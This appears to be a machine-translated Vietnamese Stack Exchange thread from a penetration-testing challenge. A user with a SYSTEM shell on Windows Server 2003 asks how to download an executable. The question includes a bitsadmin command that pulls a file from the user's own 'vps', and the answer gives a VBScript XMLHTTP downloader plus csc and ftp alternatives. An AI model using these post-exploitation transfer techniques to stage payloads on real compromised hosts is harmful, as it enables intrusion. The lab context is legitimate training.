Cách tải xuống tệp bằng CMD.exe [trùng lặp]

0

Câu hỏi này đã có câu trả lời ở đây:

Tôi đang cố tải xuống tệp thực thi trên máy chủ windows 2003 như một phần của khóa học Kiểm tra thâm nhập Tôi đang làm ngay bây giờ và dường như tôi thất bại ... Powershell không được kích hoạt và bitsadmin chỉ là "đóng băng".

C:\dlhere>bitsadmin /transfer ez http://vps/executable.exe C:\dlhere\test.exe
bitsadmin /transfer ez http://vps/executable.exe C:\dlhere\test.exe

BITSADMIN version 2.0 [ 6.6.3790.1830 ]
BITS administration utility.
(C) Copyright 2000-2004 Microsoft Corp.

Tôi không biết gì cả ...

Tôi vừa có được quyền truy cập dòng lệnh với "nt thẩm quyền \ systemd".

security  windows-server-2003  file-download 
ovxrfl0w
nguồn
1
Ghi chú khóa học của bạn sẽ hữu ích hơn chúng ta.
ivan_pozdeev
procmonvà / hoặc một trình thám thính có thể làm sáng tỏ những gì đang xảy ra với FS- và mạng khôn ngoan. Họ yêu cầu quyền quản trị, tất nhiên.
ivan_pozdeev
Chà đó không phải là khóa học - giống như thử thách hơn ... chúng tôi không có giấy tờ nào ngoại trừ cách kết nối với mạng cục bộ,
ovxrfl0w
3
Một số giải pháp ở đây phải hoạt động: Có thể tải xuống bằng dòng lệnh Windows không? Ngoài ra, nếu bạn có quyền truy cập cấp hệ thống, bạn có thể bật lại PowerShell.
Bến N
1
Máy chủ Windows 2005 hả? :)
cʜιᴇ007

Câu trả lời:

0

Theo Công cụ BITSAdmin - MSDN ( /Transferphần chuyển đổi):

BITSAdmin cập nhật cửa sổ lệnh với thông tin tiến trình cho đến khi quá trình chuyển hoàn tất hoặc cho đến khi xảy ra lỗi nghiêm trọng. BITSAdmin hoàn thành công việc nếu nó chuyển thành công tất cả các tệp và hủy công việc nếu xảy ra lỗi nghiêm trọng. BITSAdmin không tạo công việc nếu không thể thêm tệp vào công việc hoặc nếu bạn chỉ định giá trị không hợp lệ cho loại hoặc job_p Warriority. Lưu ý rằng BITSAdmin tiếp tục chạy nếu xảy ra lỗi thoáng qua. Để kết thúc BITSAdmin, nhấn Ctrl + C.

Vì BITS được thiết kế để chuyển ở chế độ nền, nên việc này có thể mất thời gian không xác định nếu mạng bận - và đặc biệt là nếu dịch vụ BITS không chạy (tôi không kiểm tra xem lệnh có khởi động không).

  • Ngoài ra, bạn có thể tải xuống với chức năng .NET theo Cách tải xuống tệp từ dòng lệnh trong Windows, như Wget đang làm gì? ngay cả khi PowerShell bị vô hiệu hóa vì csc.exe, trình biên dịch C #, được gói cùng với .NET.

  • Điều này cũng có thể được thực hiện bằng cscriptcách sử dụng đối tượng COM XMLHTTP theo Sử dụng Windows Script Host và COM để Hack Windows (tệp tập lệnh có thể được viết bằng copy con):

    dim XmlHttp, URL, FileName, OutputStream
URL = <URL>
FileName = <FILENAME>
set XmlHttp = WScript.CreateObject("MSXML2.XMLHTTP")
set OutputStream = WScript.CreateObject("ADODB.Stream")
XmlHttp.Open "GET", URL, false
XmlHttp.Send
OutputStream.Type = 1 'BINARY_STREAM_TYPE
OutputStream.Open
OutputStream.Write XmlHttp.responseBody
OutputStream.SaveToFile FileName, 2 'CREATE_OVERWRITE_SAVE_MODE
OutputStream.Close

  • các tiện ích mạng khác có khả năng chuyển tập tin - ví dụ telnetftp- cũng có thể làm được. Tuy nhiên, những xu hướng này không được bao gồm theo mặc định kể từ Vista.

ivan_pozdeev
nguồn
Có FTP đang hoạt động nhưng dường như tôi không thể làm gì được ... Tôi có vỏ netcat.
ovxrfl0w
Chà, bạn cần biết các lệnh của bảng điều khiển FTP và tường lửa (tất cả các cách đến máy chủ bên ngoài của bạn) sẽ cho phép lưu lượng FTP. Chế độ thụ động ( không phải là mặc định cho chương trình giao diện điều khiển) cũng có khả năng được yêu cầu.
ivan_pozdeev
Khi sử dụng trang web của chúng tôi, bạn xác nhận rằng bạn đã đọc và hiểu Chính sách cookieChính sách bảo mật của chúng tôi.
Licensed under cc by-sa 3.0 with attribution required.